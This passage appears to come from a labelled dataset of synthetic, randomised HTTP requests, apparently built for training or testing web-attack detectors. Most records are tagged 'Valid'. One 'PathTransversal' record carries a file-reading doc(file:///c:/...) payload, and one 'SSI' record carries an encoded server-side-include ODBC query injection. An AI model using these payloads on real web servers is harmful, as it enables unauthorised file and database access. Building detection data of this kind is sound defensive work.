If-None-Match: "TyfEi3MSX1zMbF4"
If-Range: *
Max-Forwards: 479
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 7rrBtu z1te=odiIon
Range: -97,11-
Referer: http://ercoRe.st/onfndir8/afag/7tehEi/e4hsr0h/AeErnik.png
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 2.0; sr-tn; rv:2.0.5) Gecko/35064704
UA-CPU: x86
UA-Disp: 4987,665,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 026x5801
Via: rtfAn/9.2 www.aSaeugrg.gif
Transfer-Encoding: deflate
Upgrade: ire/8.1, eahte/4.5, eos/9.6, rle/1.8
Warning: 661 www.ngtao.tiff "ezebae8kput" 
X-Forwarded-For: 156.122.130.190
X-Serial-Number: 410317302
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

difanet9=sserviceshe&551b0Ax1=oXbV&mtemu=Nc73forrt9ulocxi4&fds=hvaXlrngld9/c1&passthru8usrJrz4=t njhesiy>cN&ywpu=t)tig4wn7\1includeeoautoexec&mJcopy@ti.=rl&ejnassttw1fld=nreN&abaaEebyTbrhve=w~ap i4 kE&GandHIacceptdj4UUhomes=coa79i&tmu:&tf9ln=Cee8nioeNp&H4tdT=3Pu9E_l8bSc

End - Id: 33584
Start - Id: 34614
class: Valid
POST /tA/iU/srYerieh/nso1aeaanRe/5t.eVwriIolh0DJUmou/NEttrhe22thi1B/a_jI/efYIiwir7j/n7MEC-gfjQvpuLsAN/oCKoO2HPhfdHBB2RB-1C/pp/t6XHA6GJT.asmx? HTTP/1.0
Content-Length: 277
Content-Language: eYtIosAa,oDc,osri6
Content-Encoding: identity
Content-Location: /ohsnyi.swf
Content-MD5: b3V4R2RocmU3aG5waWV2Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Mar 10 20:09:40 GMT
Last-Modified: Fri, 28 Jan 05 22:17:50 GMT
Host: 92.120.117.104
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 242.105.146.186
Cookie: sibre6lcfbvu=vu2;2t1GQ2Qb=9137;rsncdOS=xaOEi;sa6sTpehrhio0=r7jR;orTumas=hGr1GVuJX.J9;QeobsdrBewsosj=ic C8
Cookie2: $Version="89"
Date: Thu, 15 Jan 09 07:48:24 UTC
ETag: W/"li4Zf1d-Enhb1U4"
Expect: 100-continue
From: 9acwoadm@8yele.org
If-Modified-Since: Sat, 11 Jun 05 07:09:26 GMT
If-Unmodified-Since: Sat, 14 May 05 04:44:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Oct 04 14:10:31 UTC
Max-Forwards: 758
MIME-Version: 8.1
Pragma: E3hh='nkf'
Proxy-Authorization: Digest uri=http://3just.gov/rahno/3iaN/ihov/nylA/agere.mp3
Authorization: Digest algorithm=MD5-sess
Range: -64
Referer: /Eemee/zie5t.nsf
TE: chunked;q=0.8,trailers,trailers
Trailer: Range
User-Agent: Mozilla/1.2 (compatible; MSIE 3.3; Windows NT; Ogym)
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6005x647
Via: FTP/0.1 www.nodO.css
Transfer-Encoding: identity
Upgrade: i0taeg/8.4, k4xlia/5.0
Warning: 638 32.100.231.190 "ronreot0rsachetajte" 
X-Forwarded-For: 207.213.57.172
X-Serial-Number: 1977553705
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ieoo=tCiMzWA&sradi=oTutdchildt9\a%&eahiyn=sqWMzoNScad&yLe=r&yo2hepelik=74yIO0&oy=eab&t6udeo=29661&iebhpieel2ins=stdinr3z&icootyaHEaie=zfiweaidhemaOf&wtrn=oRvQHGloq&dv8za9iGIllzt=lioaewovddeha&Cgclsgroup byCA=huVwTHK5sq&Wak5sewh1=ad6hmochaasaueL>&eidiwp9yage=a4usr&7s=ie1a

End - Id: 34614
Start - Id: 23829
class: Valid
GET /tstjpcmstsnpeyr7d/wLim7etdyswfrpbjnir/iorh/hH9e/ue3n8nbt/jeDfwld/Pxsslg/lD8yK6Dpv/9vyPmailbIconnect2YhoupdateL.msf?Biwposition8Q=lxcrriAttnldeal&it2=84&cn=nKUufV2PZQs&X8cIxHUIEwinntg-=p%2Fadocumentegaegsock_streamyi&wzC.cdstdin2W6=niUU&ofersuel7omae=%29%3Eflu&aimqwblIDy=uscm+&gjaLnvbartide=250576&aecnt1ffttl=786113110&UW-i=olyE%27o&tugssAwe=agl0h&li1snnpr0e7ytT=ldhfW82Zx8R2 HTTP/1.0
Host: www.sCjm.be:77
Connection: close
Accept: */*;q=0.0
Accept-Charset: macintosh;q=0.4
Accept-Encoding: compress
Accept-Language: deoc-fSeqyec;q=0.9, c7tl-lhbo87io, ayseenr9-eehc1S;q=0.2, aaEei-reu;q=0.5, loAome3-fot;q=0.5
Cache-Control: max-stale=962
Client-ip: 118.45.199.188
Cookie: UNaccess_logZetchLLqmP.=1517797097
Cookie2: $Version="7"
Date: Thu, 14 Oct 04 04:03:31 GMT
ETag: W/"L3jINxLdWgkcSg_n"
Expect: E4noAon=yehgmF;aais
From: dhmtihz@kNxat8.be
If-Modified-Since: Wed, 14 Feb 07 02:28:46 CET
If-Unmodified-Since: Mon, 20 Apr 09 22:26:47 GMT
If-Match: *
If-None-Match: "@PAiY7XjglRI7h5wQ93"
If-Range: Sat, 15 Oct 05 03:12:46 CET
Max-Forwards: 6584
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest uri=/ln8hs/rwftwxmi/lsfnstri/ioohjn.php4
Range: 484-,58283-,553-
Referer: http://www.OlhancId.ch/u6beicn/0emnrto/lwntmr5/6januns.mdb
TE: deflate,trailers
Trailer: Host
User-Agent: Mozilla/5.8 (compatible; Konqueror/2.1; Solaris; nadahveu; drothtw; xht31l)
UA-CPU: PowerPC
UA-Disp: 6328,311,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 646x2979
Via: FTP/9.2 www.fnjNul.htm
Transfer-Encoding: compress
Upgrade: nay/4.9, hiEdJm/5.4
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23829
Start - Id: 5616
class: Valid
PUT /noe6ioEthesnrElyai/shyRihitf/gtw8exlrlt9/_Fs6servicesn@qB/cmWGN1oXQ7goD/n.NEugQNCfw@e5Sm/aG9U6F.4iHEM1a2A/O2dSrd8.jpeg? HTTP/1.0
Content-Length: 91
Content-Language: si,Svuty9
Content-Encoding: gzip
Content-Location: http://www.lbnT.uk/oegheo5N/astndPN.tar
Content-MD5: MkphdVRib3Rob2VyZXZudA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 11:05:57 GMT
Last-Modified: Sun, 08 Nov 09 01:09:52 GMT
Host: www.snkkuia.fr
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: lnet-shio;q=0.8, w-cRpnTh;q=0.5, ll-Rriei, taj-atto
Cache-Control: d='aoe8oe'
Client-ip: 101.218.67.81
Cookie: emws=[stdinpjjesecbshi@qqS;ea=i0a0hs;eie6drzjz=0700;Ta9raehedmjt=1
Cookie2: $Version="74"
Date: Fri, 09 May 08 24:46:00 GMT
ETag: "bcRo.rDFW3u19MgT"
Expect: Rrcxduk
From: retom@4teeztn0w.uk
If-Modified-Since: Thu, 27 Sep 07 19:41:54 UTC
If-Unmodified-Since: Sat, 19 Feb 05 13:50:15 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Nov 06 10:44:34 UTC
Max-Forwards: 351
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: NTLM aGFhMklibHNhOW9lZ0VPM2RoRXRlYXRlN3JaWmluYmlkeG5uSHFyYmw=
Range: 67795-,06619-,662301-47622
Referer: http://www.sjasomd.ch/itsy/yone9.pl
TE: gzip
Trailer: If-Modified-Since
User-Agent: fkrJeo (eNG1H3kJK; 3OTf0G; oW4xw3XsR; gAM_tViw; aP9vRf)
UA-CPU: StrongARM
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0202x3743
Via: HTTP/4.6 225.65.248.130
Transfer-Encoding: ltjhe
Upgrade: uv6jTt/2.4
Warning: 803 145.78.232.247 "ihmqhTtecao" "Wed, 20 Aug 08 01:29:34 GMT"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

gaoao=N titj\teec'-&lptlneehiyhu=tDmPGFneA9&9Rq7qbSK1=Venh&zefeOm=34&hMRQchildN=ztr1are

End - Id: 5616
Start - Id: 44736
class: PathTransversal
GET /6zJZIehRwvA9Nd5PLSFz/cx2jOGvVwOhD_cmml./xdi7Ur/nn6eoTemtin/C5oeh6ePieelUjeo/aox6dtee/rf8LTBAPFY.3YI/rFU.exe?etanthGean=w2oqe6nqmjzO&hSR@JdD7uc=uje+&blikervErm=nrrkeomdcPlw&emseti8e=3961739&WrniohIEtr=ic3Lj&Tsher=pl%2Frt%2Btih-ct+stne&5sl=nm0selectA&ieoSgptba0itoDf=doc%28++file%3A%2F%2F%2Fc%3A%2Fnutrc%2Fronaroy.xml+++++%29 HTTP/1.1
Host: www.1n5zho.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-932;q=0.2
Accept-Encoding: identity;q=0.8, gzip;q=0.2, gzip;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 237.182.46.186
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="66"
Date: Tue, 04 May 04 05:20:57 GMT
ETag: W/"zA.aoV@g1KTOsZ7."
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sun, 11 Feb 07 22:23:30 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Jan 10 17:48:31 CET
Max-Forwards: 743
Pragma: no-cache
Authorization: Basic dGJvZTlkOmZhNmE=
Range: 218-,38304-
Referer: http://riEfbe.it/4eeb4iOs/tscuu/ncur.cfm
Trailer: TE
User-Agent: ygloedadXeo4
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44736
Start - Id: 21887
class: Valid
GET /tA7L/VXAfZ/tbanbooancf0/rpxtofoes/_S1fmochasam7ki-lkOrusr/eliT/aecn8dodynjrrdnsU/wGDKnodein.pl? HTTP/1.1
Host: www.8sphcrh.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: dR=znx3k
Client-ip: 77.124.253.80
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="085"
Date: Sat, 19 Dec 09 22:51:32 GMT
ETag: W/"yjNA9XkPUWq5sNl"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Fri, 22 Apr 05 19:27:09 GMT
If-Unmodified-Since: Wed, 06 Feb 08 03:49:39 GMT
If-Match: "VkkRRf2GiBeiPEPsdqoI"
If-None-Match: *
If-Range: "ge6XUtF4MBe.-9Z"
Max-Forwards: 669
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: Basic TGxlaTpjMnJzcA==
Range: -34244,001-
Referer: http://dsla.it/lwhi/g1eonnow/EtUtNxe.shtml
TE: chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 2.1; bi-Y2; rv:2.7.4) Gecko/16173823
UA-CPU: StrongARM
UA-Disp: 9551,981,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 196x452
Via: HTTP/5.8 www.hhys3i.tiff, 8.8 154.104.212.110, FTP/9.0 204.38.183.107
Transfer-Encoding: gzip
Upgrade: 7c8/8.3, xeima/1.3
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21887
Start - Id: 16370
class: Valid
GET /lRNsD6/ogiArtsifucteinae/-ClYGpsjFGTVZHO/ef_suhPH_IN/Iajiaonh/dw5iEotshtolrrg/9.ehTkifpwKAZ5QE/sDMFl2AkZfPpCPMgE1cC/dVDqZvfheZvaM7Gb2l/yE66_pNw/iz.FG.jpeg? HTTP/1.0
Host: 91.184.8.46:98258
Connection: 0migdze
Accept: */*
Accept-Charset: iso-10646-ucs-2, utf-8
Accept-Encoding: compress;q=0.9, deflate;q=0.4, gzip, gzip;q=0.3, deflate
Accept-Language: *
Cache-Control: min-fresh=27124
Client-ip: 134.255.60.77
Cookie: DbZCdKK6=e6yqbhz9u8ZE;Mtofa=/huePcAaccess_log;dl5atoh=loove;toirT1Tt=8789285;p5Tnaaera=85955;ysZ_Lhomeqb=dCcyaccess_logt
Cookie2: $Version="891"
Date: Wed, 16 Dec 09 13:57:24 GMT
ETag: W/"rLy6TXdC_r@nGr5mOltc"
Expect: 100-continue
From: f8Bcob@cetatdkhOv.de
If-Modified-Since: Sat, 21 May 05 11:55:21 UTC
If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: "cTV9kVlMG@YKBTumpr"
If-None-Match: "XSFmeOduK1wp9A1JQ"
If-Range: Fri, 12 Nov 04 17:02:44 GMT
Max-Forwards: 15
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: Digest cnonce="ipidpc"
Range: -652120,9-,091-
Referer: http://www.mtFp.biz/bhoegR/0anSem/ooDkm4/htgem69/6oesbruR.js
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: eExzfIjh http://www.ionit.fr
UA-CPU: MIPS
UA-Disp: 506,7421,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 942x4490
Via: FTP/6.4 www.tetiioo.htm, 8.0 www.aeOrrbra.css
Transfer-Encoding: identity
Upgrade: oE3e1/2.9, FMnex/9.0, o72ibo/5.9, dtimd/8.4
Warning: 329 87.131.7.58 "oEshdty0oueiapofites" "Wed, 28 Nov 07 21:16:00 GMT"
X-Forwarded-For: 119.235.122.105
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16370
Start - Id: 32614
class: Valid
POST /8bthmi/tjso8kA2Y_og_eT/LVX/gvOI.mspx? HTTP/1.1
Content-Length: 270
Content-Language: ebeit,mp
Content-Encoding: deflate
Content-Location: /nnzte.aspx
Content-MD5: dXdoNnF0cmtheGhld3BIbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:22:53 UTC
Last-Modified: Wed, 17 Nov 04 21:41:19 GMT
Host: 233.65.24.125
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253;q=0.1, windows-1250
Accept-Encoding: 
Accept-Language: 1ntnli-4atreoi, teIiewc-i, w8sreeye-wn1iss1s;q=0.3
Cache-Control: max-stale=8577
Client-ip: 163.113.91.254
Cookie: ej1d=zd4li;5Soarg9tQas=ce
Cookie2: $Version="949"
Date: Fri, 22 Sep 06 19:57:21 CET
ETag: "6XJvegWMaBXyXdEP"
Expect: csEol9sq
From: mhhvcrm@gtad.de
If-Modified-Since: Wed, 15 Aug 07 13:01:03 GMT
If-Unmodified-Since: Sun, 13 Mar 05 06:26:36 GMT
If-Match: "vmxxUm8eOKVqJ3w"
If-None-Match: "Rrtp22Q-ua_MBBqy3N-_"
If-Range: Fri, 30 Jan 04 10:55:40 UTC
Max-Forwards: 55
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Basic c3c5ZGFoaTE6ZXRobWFvZTU=
Range: 09-
Referer: /dsosn.html
TE: chunked;q=0.0,trailers
Trailer: Referer
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 3.4; o8-xh; rv:7.2.5) Gecko/97484846
UA-CPU: PowerPC
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2740x572
Via: 9.3 www.3iorETvf.gif:448
Transfer-Encoding: identity
Upgrade: 0ss/3.7, rol/6.4, t7a/3.1, oeOo/5.0, iui/8.8
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 73155166220455300
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3c7PuHPf=niEiedhhoteIhometo&jKqKunionICi-C@r=rsyito)@Ds%iets R7de&sracl=0sN6oA&1ovey=226&oScTyoDaOryr1t=zae1c7sr8hm8ess&4tnL=sUa94K5wz&na=eAh1qmmlvnchqtdta&PFYorBJ2wmX=ImevedmoOm&elhhzDdtfn0r=hisi:$g&b4oLi0qmcedrlnE=884861&Jbotdasl=1drtNeeIa&zhFDR=%RvSigesea

End - Id: 32614
Start - Id: 9371
class: Valid
GET /os/pV@Rb.EGOf7/c6lbc2DGB@j4Dpyz4AM/l71.3ysyQCxpxGJo/67vnMDk3gS/eMbLs4HWlZmRYX/wK9yGvQlqHDU@pMhi/rhacnTbdffauEe/neGKCkfk-YGur7/swdTNl@Uljds-gCY/eWlJuWZioq5fZ@.cfm?vagnuaorigsw=17195&gc4Titdtb3R0s=efisEdwf&scnbshoestdr=271&arhlstpe=eIrndivudocumenthomeen4%3Db&uaa=55 HTTP/1.0
Host: 228.142.151.228
Connection: keep-alive
Accept: text/plain, audio/basic
Accept-Charset: iso-2022-jp;q=0.9, x-mac-ce, isiri-3342;q=0.5, cp-932;q=0.6, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 243.234.59.13
Cookie: n4x.c6JPvxterm7=h)StE9;tmpLtM5iqV=oTqhi
Cookie2: $Version="0"
Date: Sun, 09 Jan 05 20:39:40 UTC
ETag: "kOEtKOOZ@BqLytEYE"
Expect: 100-continue
From: ofie@0ert.fr
If-Modified-Since: Mon, 12 Jan 04 24:16:49 CET
If-Unmodified-Since: Tue, 01 Jul 08 11:16:42 GMT
If-Match: *
If-None-Match: *
If-Range: "n_u1_bRWJUSeqbO"
Max-Forwards: 414
MIME-Version: 3.5
Pragma: scs7tcna=Y1
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Digest realm
Range: -38990,-9
Referer: /haEuhcy/t4ea6u/n2cerel/taIod/efnesEl.bin
TE: trailers,trailers,gzip;q=0.8
Trailer: If-Match
User-Agent: bbaodspS (a_a.HtTz; f-NFL1eLZB)
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x3959
Via: hsonl/9.7 172.25.173.253, 5.2 www.eoiea.jpeg:00191
Transfer-Encoding: gzip
Upgrade: nn8pot/0.1, 8Rn/0.5
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 503898256971754
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9371
Start - Id: 40873
class: SSI
GET /pAeyeD/m0sTGt/nvH.tiff?9enNarw3heickre=%3C%21--++%23odbc+++connect%3D%22dop%2CsTiHy%2CtOos%22+++statement%3D%22select++*++++from++2v%22--%3E&yAlink_z=ds61h+ioD%3Binla&sbG-boN=85&tlfdh=asc&eropa=l6e3Fyyl9.L&jcpngn5ir1uaai=7539 HTTP/1.0
Host: 69.14.131.206
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 13.72.58.206
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Sat, 02 Apr 05 15:24:34 UTC
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Sat, 17 Mar 07 08:04:25 UTC
If-Unmodified-Since: Thu, 18 Aug 05 05:32:04 UTC
If-Match: "FT6m8BxwR2o8CgxLkBIg"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: *
Max-Forwards: 94
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: -375,-4
Referer: http://htntt1.org/ufepfd7B.asmx
TE: chunked;q=0.0,trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/6.0 (X11; U; Linux i386 3.9; a1-og; rv:7.8.3) Gecko/21333953
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40873
Start - Id: 12624
class: Valid
GET /sJ8hr2NW/I1_I7script/ernIlmr/nDDtLu.msf? HTTP/1.0
Host: www.tco5cea1N.it
Connection: keep-alive
Accept: text/*;q=0.0, image/jpeg;q=0.8, image/jpeg
Accept-Charset: iso-8859-8-i, x-mac-hebrew, iso-8859-9
Accept-Encoding: 
Accept-Language: ict-ht2sr0il;q=0.4, mlfe-gh;q=0.2
Cache-Control: min-fresh=2953
Client-ip: 225.71.167.9
Cookie: aLesont=~9teU6T2ai|Tli;babeweg2ch=7959235835;e5sm=oiae;ofh3sRgeg=891917804;toulgoopg84gsn=5165198;hnryQbowdixhqgi=uIvaraer
Cookie2: $Version="5"
Date: Thu, 17 Aug 06 06:28:00 GMT
ETag: "lC0mVi3vuwsnqgx"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Fri, 11 Dec 09 13:37:12 UTC
If-Unmodified-Since: Thu, 03 Jun 04 13:59:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8157
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Tpst y8ci=Ra7si5G
Authorization: nIauos 57bft=reatt
Range: 876-,6-,682-
Referer: http://r84nyhcn.gov/wthaH6/aamo/reexpez/Ndso3xp/ed1ih.mdb
TE: gzip,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 0.7; oa-sn; rv:4.0.2) Gecko/86247258
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 280x609
Via: 2.1 71.133.17.161:85698, aeFh/9.8 www.ltiu.jpg
Transfer-Encoding: identity
Upgrade: ecc/3.0, uoz/4.6, asr/7.3, iyUor/1.5, ouaiR/5.0
Warning: 296 www.3nsUcnrd.png "not8taFAgawwrmldia" "Thu, 31 Jul 08 14:24:39 UTC"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 5299334202326422361
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12624
Start - Id: 34766
class: Valid
POST /mflvRnUhbxHypUUY0/phpkp7npYF0h7zGgn/mSconnectoRQ27nf/hOsasanrhdA/OP0a19N_.jpeg? HTTP/1.1
Content-Length: 183
Content-Language: n3dmt,ntda,z
Content-Encoding: deflate
Content-Location: http://www.Ian3.org/9nms7oL/t3c2i/edatj/mlAba.asp
Content-MD5: b2V6cW5paUg3ZDB0bHdkeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Mar 04 17:50:22 CET
Last-Modified: Sun, 30 Mar 08 18:43:50 GMT
Host: www.feCozre.ch:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 38.141.39.26
Cookie: aes=977950;h-vA=bs
Cookie2: $Version="4"
Date: Sun, 28 Mar 10 21:34:29 CET
ETag: "IxkX.6S.l@poZtH-_RAb"
Expect: rnuaet
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Fri, 13 Jul 07 11:51:02 GMT
If-Unmodified-Since: Tue, 16 Mar 04 03:39:55 GMT
If-Match: "FemujSPC8eSb3wF5"
If-None-Match: *
If-Range: Sat, 09 Aug 08 10:35:43 UTC
Max-Forwards: 3734
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: wIfEle enFonbe=shigcnoo
Range: 019-
Referer: http://enLaP6eY.it/N2ssureg/s7db/E2Eei/tmmh/iaNf.js
TE: deflate,gzip;q=0.0,deflate;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (compatible; MSIE 2.7; SunOS sun4u; naadbai5i; ce8rma; xaee)
UA-CPU: StrongARM
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 012x6742
Via: FTP/1.4 157.170.137.113, kIrnno/9.3 www.seeec.png, 5.1 www.evn2OetH.shtml:19
Transfer-Encoding: gzip
Upgrade: slct/7.5
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 24.228.137.43
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hndlriiki=417&6owKaatt=S &iehehiarreke9co=57307&iiyucbeO7itdnf=8969744221&4n=Reln3d&x23xbwindow.open9YzNK=71800&@ier6Kc=enode&idt=730&N46copyZwindow.open6-0=4&gtoh7namfnoeh=e2LHEBSUH8

End - Id: 34766
Start - Id: 21668
class: Valid
GET /yj/aue.shtml?FZpusock_stream=tr&te=56634&lha=3&httoa6=970 HTTP/1.0
Host: www.6srdntOsa.net
Connection: close
Accept: text/xml, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.0, deflate;q=0.5, gzip
Accept-Language: clposN-dtne;q=0.7, eseby-an;q=0.9
Cache-Control: i=teypm
Client-ip: 8.140.139.237
Cookie: aa=04904202;Tq79DH=lrQdsamrtyfnenrQ;js8eS=14;neurhnt7hrnin=c+alll5theeEe7;wFfromeYcopyY=ianott5edEgE8yo
Cookie2: $Version="941"
Date: Sat, 19 Jul 08 16:45:51 GMT
ETag: W/"S6Gp@8799WoQeaOxtO"
Expect: tamabw6z=temuhm
From: ynfima@o2e6raaBs.org
If-Modified-Since: Sun, 09 Mar 08 08:27:58 UTC
If-Unmodified-Since: Fri, 07 Dec 07 03:27:34 UTC
If-Match: *
If-None-Match: "u-YB8fHcWlg0JkH"
If-Range: Thu, 22 Jul 04 23:55:48 CET
Max-Forwards: 8262
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: naoa orne=tnlmssv
Authorization: Digest response="a5eBE9a2e4CAC888d792FB8EbBdcD3a8"
Range: 77769-,-314844,31-11
Referer: /jo1nxnig/88ssla/louakahi/orrAnbdh/nxordngr.pdf
TE: trailers,trailers
Trailer: Expect
User-Agent: wrand5oo0i/6.6.6.4.7
UA-CPU: x86
UA-Disp: 6270,1333,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 838x039
Via: 7.8 www.tnwetLe.jpg
Transfer-Encoding: compress
Upgrade: rez4na/9.8
Warning: 014 123.249.187.19 "ccuiedee" 
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 5531184151712734020
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21668
Start - Id: 156
class: Valid
GET /AAiseeSzbVz0nr/tE2/sb/t1A/tpzJjvX9wA/1gBOuFvQ/1ZWlocation/ldueyrtlehyiatax/in8enmlAr9evaetwzdm/aHv6/ie4adab9.css?Neroiod9eto6Nit=a8j HTTP/1.1
Host: 130.156.234.77:873
Connection: nSpodse
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
